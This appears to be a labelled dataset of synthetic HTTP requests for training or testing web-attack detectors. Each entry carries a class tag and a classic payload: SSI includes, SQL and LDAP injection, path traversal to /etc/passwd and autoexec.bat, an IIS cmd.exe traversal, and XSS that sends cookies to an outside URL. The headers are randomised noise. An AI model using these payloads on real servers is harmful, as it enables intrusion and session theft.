Accept-Language: hL1i-o, o-mtnemoj;q=0.2, 6coid-nc;q=0.1
Cache-Control: no-store
Client-ip: 255.140.114.178
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Wed, 15 Mar 06 06:43:04 CET
ETag: W/"@I55TFnnWMOE6wgh"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Fri, 07 May 04 08:49:06 CET
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: *
If-Range: Wed, 26 Aug 09 07:11:13 GMT
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZGhvaW5yZWlhdG1lcmV5Z2luam9Ub29hY29sNWxkbmgzT2VpcWVudGR2dGZTcw==
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: http://netet.de/wepeys/ojNan5/dtha4ts/cdurh9s6/7qteo.conf
TE: trailers
Trailer: Date
User-Agent: srdeNlo (sIPp5Zt)
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 718x8492
Via: 0.2 35.169.79.117, HTTP/3.5 253.74.79.228, 2.0 www.iueozaod.png
Transfer-Encoding: rhlea; amggdiAH=wxoolet8
Upgrade: enhru5/4.5, lMue/6.6, lspKk/5.1, 9hrt/4.0, 0aisl/1.6
Warning: 707 66.170.198.17:64394 "nmdeaEo7jen" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49238
Start - Id: 40547
class: SSI
GET /lCCiRAeh98/cpositiontelnetexecservicesshutdownTmOVhV/lu/xUet1r/hhitdotogbso3/vunionTln/nHD-DWF6xC3Ay@rgdGs/thee/a4/omrehe7t6syohhnaqP.js?IqcGf7T=%3C%21--+++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: www.ztaiiltdN.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 32.122.234.119
Cookie: oVFIa5ZQDgL=26762
Cookie2: $Version="45"
Date: Sat, 22 Oct 05 21:19:48 CET
ETag: "jnUwgr1CydoaN3UHm.bx"
Expect: 100-continue
From: dllx8s1@F9aYw68.biz
If-Modified-Since: Sat, 12 Mar 05 17:23:17 UTC
If-Unmodified-Since: Thu, 01 Jun 06 22:34:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 143
MIME-Version: 1.2
Pragma: ceile='mremttA'
Proxy-Authorization: eyuU tZee=sndi
Authorization: uhoI ah7yoa7o=nnhehre
Range: 95-,-86,7-40258
Referer: /i29hik/vo2ef.aspx
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 7.5; g4-C5; rv:3.7.2) Gecko/29408283
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0457x8183
Via: 3.5 www.de66.jpeg
Transfer-Encoding: 6Yoey
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 9009184147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40547
Start - Id: 41647
class: SqlInjection
GET /o_eQ7pk_3I/n2pmVGgSO3BJ/cK1J/3Or2faQBA4-VJQ/o5D/P8hyts/sbielAceltopiirLt.css?mxaoXsqe=%27++++OR+++%27eOys%27+++++LIKE++++%27aze%2525 HTTP/1.0
Host: 61.200.209.100
Connection: usdiYr9l
Accept: video/quicktime, audio/basic
Accept-Charset: utf-8;q=0.6
Accept-Encoding: deflate, deflate, compress, gzip
Accept-Language: *
Cache-Control: max-age=8807
Client-ip: 91.9.66.11
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="52"
Date: Tue, 15 Jan 08 05:40:16 UTC
ETag: W/"DYrqCWSJ5vu8_ST"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: *
If-Range: "b7a4y_incQ3X85IN"
Max-Forwards: 39
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: NTLM czFmZHVhbW9pc281c2lyMWVyZUVoaWxhNU9ucWVsczB0TUJuOHVlbGJMaWhl
Range: -11289
Referer: http://y5sqoite.biz/ebr83/tSnf/eaweoc/iets/CSvT.tar.gz
TE: chunked;q=0.5,gzip,trailers
Trailer: Range
User-Agent: 4dhdfoe
UA-CPU: MIPS
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: HTTP/4.0 www.eaotb7h.html, 9.3 216.82.44.81, FTP/0.2 211.125.91.162
Transfer-Encoding: compress
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41647
Start - Id: 44994
class: PathTransversal
GET /r@tDeaGGNwvarOy/etittshlb/_vF5/34GXpi7w/X80Xtd7T/LTA.js?atSl2=24&Ue3i1roehhatkn=e%24a+++Gi&6csasdsasenn=671701&@Rbl=txxePif5q-y-&7ol=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&tetpilhz=%3Bo6s6&utdr=1310&toseveYtdikr=%3Dt%3Eetmpepositiontir&caa=eqrlxD01&ht4=arnbIts0i&et3utonatfzat=saN9&0K.P4yinsertP3=5 HTTP/1.0
Host: www.oo9eeit.net
Connection: close
Accept: video/mpeg, application/postscript
Accept-Charset: x-mac-cyrillic;q=0.1, us-ascii;q=0.4
Accept-Encoding: gzip;q=0.5, identity, identity, identity, deflate;q=0.2
Accept-Language: *
Cache-Control: no-transform
Cookie: 0ajNC=0ttRrg(u i/o4t;eohkt=Ezetd
Cookie2: $Version="55"
Date: Thu, 02 Nov 06 16:01:17 GMT
From: SiHai3@Rl2imga.fr
If-Modified-Since: Tue, 25 Dec 07 03:14:44 CET
If-Unmodified-Since: Mon, 30 Jul 07 07:36:32 UTC
If-Match: *
If-None-Match: "rFepa2Mgx-zPRm7Lo8tP"
If-Range: Wed, 08 Feb 06 02:43:25 CET
Max-Forwards: 4373
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Referer: /Iorh/rynmome/xFaxrd.dll
User-Agent: d24meedlxv (fnuQyfNN6)
Via: 1.9 www.uitvp.jpg, 3.0 www.oncGix.gif, FTP/4.8 www.ujDoare.css:443
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44994
Start - Id: 46936
class: XSS
POST /d9RsJ/nOx2rVnS7Iwinnt/ewicdi9ik2aeeoGip/Vqs0GNjOuT/st/57aphiItenrelr/t9rhkxec/owin9/gbhLr/g4fUJWfAh.gif? HTTP/1.0
Content-Length: 460
Content-Language: fh7rteS,ehiaep,sn
Content-Encoding: deflate
Content-Location: http://tmelbw.net/tib6m/goqeerus.jpg
Content-MD5: aG85TmhjYWFzaXRpWmhvTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 10 17:02:26 GMT
Last-Modified: Tue, 05 Jan 10 12:30:21 GMT
Host: www.hu96enuetm.biz
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: euc-tw;q=0.0, iso-8859-8
Accept-Encoding: 
Accept-Language: Bege-ue, esRlznoH-1;q=0.8, nyfb-Dgs, afegoHi-haeu
Cache-Control: max-stale=74
Client-ip: 68.207.188.146
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Thu, 20 Sep 07 18:34:38 CET
ETag: W/"zS@IPwMakTh0z0W5imO"
Expect: Loer=fteWoeui
From: ncieL@oi8koae0fn.net
If-Modified-Since: Mon, 04 Sep 06 09:45:29 CET
If-Unmodified-Since: Tue, 20 Apr 10 03:37:03 UTC
If-Match: *
If-None-Match: "mDBwr-w9dGnxE36"
If-Range: *
Max-Forwards: 1982
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest qop=v1tssr
Range: 455810-240,-24385
Referer: http://www.d26qgc.uk/aeiioeds.doc
TE: trailers,trailers,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (compatible; MSIE 5.2; Mac OS X; 81eevmR; yu8et)
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 786 205.251.22.179:965 "eu9tt91t" "Sat, 27 Jan 07 19:48:05 UTC"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

0sSlgH18Lwindow.openv=tj9kmu$ys6@2hd&9rwptet= i&bucrh8xrAsp=c<isystemn&zAnaoieeS5O=05979950&dstce=7755088790&essiwa=791077&koe=09406&zdaseat4jie5os=eCPoA_UM&khn4ehetrz=dbiantersind3ev&connect-1RX8lMsC=rr&o ]access_logoeearsre&se1ohoprei8e2eE=Extosee&rn= Rld&8nw8lr=[\xC0][\xBC]script >[document.location.replace   ('http://www.onneatle.com/cgi-bin/ni.cgi'+document.cookie);][\xC0][\xBC]/script>

End - Id: 46936
Start - Id: 45876
class: PathTransversal
GET /eushe8.cgi?tmha6tbacEkiNjS=..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: www.n7ukd.net
Connection: stsB
Accept: audio/x-wav, image/png;q=0.4
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: eZr-h;q=0.4, Dio-lsden, eirho-7zT;q=0.2, ehjlinin-oet;q=0.8, rlr-inmt3;q=0.8
Cache-Control: no-transform
Client-ip: 251.11.69.130
Cookie: 9yhI=78;nO=55ly
Cookie2: $Version="07"
Date: Wed, 20 Apr 05 13:36:09 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: 5roeHeR9@nsl4pe.de
If-Modified-Since: Wed, 29 Nov 06 09:21:24 CET
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: *
If-Range: Fri, 02 Jan 09 12:35:24 UTC
Max-Forwards: 3
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM b2hmdHJpYmF0aUFzZWFwRjRpbGw2ZmUxc3dyaGRzMnllZmhtZGg3M2hhdGhl
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: http://www.asiniy.biz/etok4DtN/ebmdst.php3
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: s76c4hr http://www.dorxadg.it
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: 7.8 www.2Sennyn.jpg:7537, 3.9 www.esrT.htm, HTTP/5.1 134.72.214.137
Transfer-Encoding: deflate
Upgrade: uerl/3.0, gur/9.5, vSut/6.5
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45876
Start - Id: 39441
class: SSI
GET /hZ5mndaeToele2oitn/lomoh.cgi?dznsfeamo9cewA=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&pyhrila=ngbu1p6Igx_y HTTP/1.0
Host: 91.41.159.124
Connection: keep-alive
Accept: video/*;q=0.4, image/jpeg;q=0.9, text/*
Accept-Charset: iso-8859-4;q=0.7, koi8, windows-1257;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: ii2-Rentjwe;q=0.8
Cache-Control: only-if-cached
Client-ip: 33.166.94.235
Cookie: idazxshl=aepl4shsi;spy2wecEunJrh=qtuS;ri6c=h5mi;y6HorbodyXIWmV=rFNqn-2P;53shtt=58060
Cookie2: $Version="44"
Date: Thu, 02 Oct 08 01:50:12 UTC
ETag: W/"g-ksgTJnyj4@HQLJR7_n"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Tue, 09 Dec 08 01:35:34 UTC
If-Unmodified-Since: Tue, 17 Jul 07 24:34:46 CET
If-Match: "iMSJc-x7WQIE8gJ"
If-None-Match: *
If-Range: "ghcvZRmM6m1@HUw4zXuo"
Max-Forwards: 63
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Digest opaque="nlchkwo"
Range: 73-4339,804-,5553-97644
Referer: http://www.rtswa.it/6WT2t.jpg
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Authorization
User-Agent: jvgGWE3 http://www.ylsE9w.be
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 592x7670
Via: HTTP/7.6 249.95.55.166, FTP/5.7 www.nDTt.png
Transfer-Encoding: identity
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Forwarded-For: 250.217.107.185
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39441
Start - Id: 36928
class: LdapInjection
POST /tg2tf/sltN892qS5/rDfAwteaa2ctdrt/eeLeO/aj4T8Sk82b0mMJ/tyyFO9_89wvdq/lE4oonaai/fromnZK7UAA/KmS5loeK.jpg? HTTP/1.0
Content-Length: 164
Content-Language: mow,l,yoade
Content-Encoding: identity
Content-Location: /eWs0/r7wqTat/ooOo/cfnT9/cgerat.gif
Content-MD5: ZW54ZWVlZWV2cWxhdGNzcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Dec 09 08:19:14 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 180.225.203.92
Connection: soeni
Accept: */*
Accept-Charset: cp-932;q=0.4, windows-1250;q=0.7, iso-8859-9;q=0.8
Accept-Encoding: compress
Accept-Language: nlitrcma-eUIEo;q=0.6, as2va-ee6sapi, 6atdcu-dwosYio;q=0.5, rN-rebaipnt
Cache-Control: no-transform
Client-ip: 162.232.160.26
Cookie: tfeht2u1ado=3976722211
Cookie2: $Version="3"
Date: Thu, 27 Mar 08 15:46:28 GMT
ETag: "RZdC@lsq9GUwPpK44b"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Mon, 09 Jul 07 10:41:30 GMT
If-Unmodified-Since: Wed, 02 Dec 09 07:55:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0255
MIME-Version: 5.9
Pragma: eyhe4ue=lSaoat
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: NTLM aHJoZXJlbmhoUnBnaG9hcHRkdGU4cmRlZG5mb2Vka2VDb3lhMGh0MTg=
Range: -312
Referer: http://yewasdve.de/ttObitk/fleiaeo1.gif
TE: trailers,deflate;q=0.2
Trailer: Accept
User-Agent: m4heSe3hz0detcIre
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tEu=87)(&(objectClass=eue)(|(sn  =    bo)(cn=s J*))&9ei=iMphx&veazhros60=1769&H.vscriptXenv4g=99&7YWutO_=crieeesah&nuistremni=ksehomee

End - Id: 36928
Start - Id: 43978
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 135.88.192.109
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.18.187.245
Cookie: fvpoqEtsiueneUu=whered;tw8oweoscmo=aa5zuweiy1-oV;eaxGusbb4etreS=icsmg5dDU02
Cookie2: $Version="378"
Date: Thu, 15 Dec 05 18:24:43 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: ro6tpn=u82ny
From: ls2l@ewemlDhle.org
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: *
If-None-Match: "SErLrC-h0mfVzu5J."
If-Range: *
Max-Forwards: 7386
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic b3NpaDphbnVl
Range: -2,795-,-91
Referer: http://fa0m.biz/2miodu/slauh.css
TE: trailers
Trailer: Referer
User-Agent: Ubpetiiiosgijegito
UA-CPU: x86
UA-Disp: 8896,133,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2346x026
Via: 2.6 www.0ixttae.png, 4.0 142.223.244.108:76143, 2.0 www.asaur.gif
Transfer-Encoding: identity
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43978
Start - Id: 45872
class: PathTransversal
GET /0hoaeiehsyntvyiaEq/olq0Fzf58k2@o_i10/hhp1trsdocgs/.aDBmocha8MexecsfB7E/i9w2wlhh.jpeg?U0wya_=%7Ehtpass9biro%7Cd&w3o=av&oopofe=iesiqiUhcksi9Rq&qdnetcatV@-jC4ZG=jttaep4nhqonppefo&eaweoEnept=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.0
Host: 47.213.216.227:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 251.11.69.130
Cookie: asikot5=8858432;dreveasTtnin5z6=sstoee+rldgpdy-ipea;a8nesm2hWtt=36154640
Cookie2: $Version="18"
Date: Tue, 03 Apr 07 05:03:14 UTC
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: ofnyan@esdcimRn.ch
If-Modified-Since: Wed, 20 Oct 04 05:33:54 GMT
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jan 10 11:44:27 GMT
Max-Forwards: 7
MIME-Version: 7.2
Pragma: Sj1rhalo='e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: dsteL 9EurCSnS=ceaotr
Range: 81947-,357703-
Referer: http://www.e6wiaxuj.de/arteeThb.shtml
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: ei.LFjuK http://www.s6i7si.net
UA-CPU: StrongARM
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: FTP/5.1 www.t4wqkngc.gif, 2.2 189.183.98.129, 2.9 67.15.176.169
Transfer-Encoding: identity
Upgrade: nrw/4.6, rEisa/4.6
Warning: 806 www.rrtO.gif "bEjljxn" "Fri, 29 Apr 05 04:59:43 GMT"
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 61308570883843
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45872
Start - Id: 40639
class: SSI
GET /Oewis/v4vk.asp?ouat5eAzLHclfo=%3A%28a&yaanobhs=nak&htpass9QinobjectPopen=79&vbetweenow=tpupdatern&aoocld=a4UuAOFX&h8pvehhpsnni=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&O9arfLndpniaft=o&Esosreom=oxDtnxt+7hfti&IQbgsoundO@Pd=53496&nAidtmAwuen=srxii1asoi1tur&nyofrttutla=764448&etyit=525 HTTP/1.0
Host: 250.123.33.80
Connection: keep-alive
Accept: application/postscript, audio/x-wav;q=0.0, text/plain
Accept-Charset: x-mac-japanese, x-mac-japanese;q=0.8, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=254
Client-ip: 134.128.236.221
Cookie: 6thpee1nei=gKV1Ya7z;pa=r>ii0tewr;retalnaf4bn=l(/E(r4rmq=1];ewibsseauyye=]dfct(de
Cookie2: $Version="709"
Date: Sun, 09 Sep 07 05:13:37 GMT
ETag: "-s_wqRBhPXwnF0CQ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 20 Nov 06 18:00:54 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jun 07 05:26:01 UTC
Max-Forwards: 32
MIME-Version: 0.9
Pragma: Vyes5h=ai
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: juft neyufee=gACne
Range: 026791-2
Referer: /wbirw6ss/hoetyee/npuoht/aiilNIat.msf
TE: chunked;q=0.0,trailers,gzip;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/6.8 (compatible; meLarm5Ahs; Solaris; wAAw3senn; aeeevs; e7sams)
UA-CPU: x86
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: 3.4 214.107.15.146, prNiip/7.3 www.FaarjSh.css, FTP/6.8 www.1Eims5.jpeg
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 360 www.eyhc6e.gif "hnatYee8" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40639
Start - Id: 46035
class: PathTransversal
GET /Onnmn/Eoh/dhtjnniowa4TelGi/8olN5r/nD42@pMmA/eMchyuj1vBL3/0teBmxh/esrfeRtve2o0aTepeixu/ydTsZq5Ef7GHsokUs/tj2OWTZVGZQxB.asmx?TnsonycaD=sa%3Achild&rrp=%297ori%7Eo%3Ffos7dexect+ha HTTP/1.0
Host: www.s5hiTr.be
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-1
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: \.\.\/\.\.\/etc\/hligi.conf
Cache-Control: only-if-cached
Client-ip: 238.4.91.163
Cookie: iiOe=vErm;teteI=hd|o
Cookie2: $Version="01"
Date: Sat, 28 Jun 08 02:03:29 GMT
ETag: "zPBbs79yjreUteBG0"
Expect: olLo=ev0eans
If-Unmodified-Since: Mon, 15 Feb 10 19:03:09 GMT
If-Match: "1DKLAE8Z102@qgZq"
If-None-Match: "@Q-2p3PXvj53esvrCofY"
If-Range: *
Max-Forwards: 39
Authorization: gntii leufe6sl=rtc8oAt
Referer: http://yfrtre.ch/0sn9eel/ookncwa.sh
Trailer: Range
User-Agent: emnHno (rSrimXUzrn; n-jy71pbkS; 64@KBeaq; i0uZ04; 5hHv7W_vu)
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
~~~~~: ~~~~~~~~~~~

null

End - Id: 46035
Start - Id: 38158
class: LdapInjection
GET /noVNrB/wp1S4TG6T7Eq6KQy/o4bd/oiZS1BN.shtml?vc=95&totinss=bLtsboc8irlt0h&2-VfjRT9sEj7=%5D+&2m=421&jCtmpCWVOtmpTudiv=574&ne=n%5Dsuy%7C%5Ddssctt&eUruICu=Tdo%29%28%26%28objectClass+%3D+++e8*%29&zdo=%3C&2mdd=73 HTTP/1.1
Host: www.Os501cdvss.org:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1258, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=86
Client-ip: 244.206.103.244
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Thu, 13 Jul 06 23:07:01 CET
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sat, 10 Sep 05 11:59:27 CET
If-Unmodified-Since: Sun, 26 Nov 06 21:04:14 CET
If-Match: "IRWVsObenByGIye0hs8"
If-None-Match: *
If-Range: Wed, 19 Mar 08 20:00:20 UTC
Max-Forwards: 005
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 4-,5139-9
Referer: http://lwrc17.gov/0lhav/wolEw6r/erc4/klke/enfld.sh
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (compatible; MSIE 5.6; Windows NT; radedii; 3utTih)
UA-CPU: x86
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: 1.6 116.31.74.204:8175, 5.7 185.107.59.153
Transfer-Encoding: deflate
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38158
Start - Id: 38202
class: LdapInjection
GET /lJq8ML-W_eVtV/totttrna/e2280z3FW/oMaGHSf/o7XFKdQC/die2rAe/eYjd/mE6CViAG2xAEM3G/vaOttnwlc9ssemSt/o68.tiff?NasWiik=1&e6tjw7TSsleS=e+a%2BT&KZXCuVoNW=llviil840OuHprw0ee&nGeAouRotne=syii&tnepAntopizvoo=tslformmailanb%25e&iia=qo9g&div774hbAc=009&9nehniond=omukn&eDDta=331&CagaGc6ejetgt=0&icuirw=38&YnEiiyt=%29++++%28+++%7C+++%28eun%3DBer6h*%29&oaknIme=4&blssuODpmNc=313&eer8nfxBrnE=dcHHa0a HTTP/1.0
Host: www.2niCiihst1.biz
Connection: agecde
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 9.211.101.123
Cookie: 6wq=j;wdtejsttr=oEsc9A;etnjsiasit8oca=oCSC_ewp
Cookie2: $Version="7"
Date: Tue, 01 Dec 09 04:52:43 GMT
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Wed, 08 Sep 04 22:27:57 GMT
If-Unmodified-Since: Fri, 06 Jul 07 20:26:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 809
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Rdht weka3=aaptr
Range: 143609-2,-687,75-
Referer: http://www.honnA.gov/eulAh.php
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Warning
User-Agent: Mozilla/4.0 (X11; U; Linux i586 2.2; if-nr; rv:7.9.3) Gecko/23757871
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: 5.9 248.205.182.57
Transfer-Encoding: YmnYt
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38202
Start - Id: 37637
class: LdapInjection
POST /hNR_HVWIF@vUJ_/n8ikRcfWVH/wEqhcXTk5tGIF/id8e/zdb1AYl@l/entIcaillsEDeA95v/saneo7ssdpnuhgO/yOaw6nit7ude/ullulsesbanSj8atoz/exjLZX6H28.shtml? HTTP/1.1
Content-Length: 189
Content-Language: h,hpE84,a
Content-Encoding: compress
Content-Location: /SnjIqkdo.exe
Content-MD5: ZWJ0ZWVldWhuc3BSN2Fhcg==
Content-Type: application/x-www-form-urlencoded
